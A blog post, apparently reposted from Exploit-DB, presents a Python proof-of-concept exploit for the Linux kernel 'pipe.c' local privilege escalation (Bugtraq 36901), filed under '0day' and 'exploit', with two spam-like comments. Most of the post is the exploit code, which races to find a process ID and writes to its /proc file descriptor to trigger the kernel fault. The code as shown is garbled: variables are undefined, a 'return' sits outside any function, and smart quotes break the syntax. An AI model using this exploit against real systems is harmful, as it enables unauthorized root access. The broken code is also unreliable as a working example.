Linux Kernel 2.4.1-2.4.37 and 2.6.1-2.6.32-rc5 Pipe.c Privelege Escalation

###############################

# EDB-ID: 9844

# CVE-ID: ()

# Title: Linux Kernel 2.4.1-2.4.37 and 2.6.1-2.6.32-rc5 Pipe.c Privelege Escalation

# Author: Matthew Bergin

# Published: 2009-11-05

# Download Exploit Code

# Download N/A

###############################

# This is a PoC based off the PoC release by Earl Chew

# Linux Kernel ‘pipe.c’ Local Privilege Escalation Vulnerability

# PoC by Matthew Bergin

# Bugtraq ID: 36901

import os

import time

import random

#infinite loop

while (i == 0):

os.system(”sleep 1″)

while (x == 0):

time.sleep(random.random()) #random int 0.0-1.0

pid = str(os.system(”ps -efl | grep ’sleep 1′ | grep -v grep | { read PID REST ; echo $PID; }”))

if (pid == 0): #need an active pid, race condition applies

print “[+] Didnt grab PID, got: ” + pid + ” — Retrying…”

return

else:

print “[+] PID: ” + pid

loc = “echo n > /proc/” + pid + “/fd/1″

os.system(loc) # triggers the fault, runs via sh

Related Posts

Tags: ,

This entry was posted on Friday, November 20th, 2009 at 8:30 am and is filed under 0day, Vulnerable InforMation, exploit. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

  1. VictorOs says:
    December 4, 2009 at 6:11 am

    Dear Author http://www.vul.kr !
    I think, that you are mistaken. I can defend the position. Write to me in PM, we will discuss.

  2. ovimail says:
    December 24, 2009 at 2:49 pm

    nice info ;P

  1. There are no trackbacks for this post yet.

Leave a Reply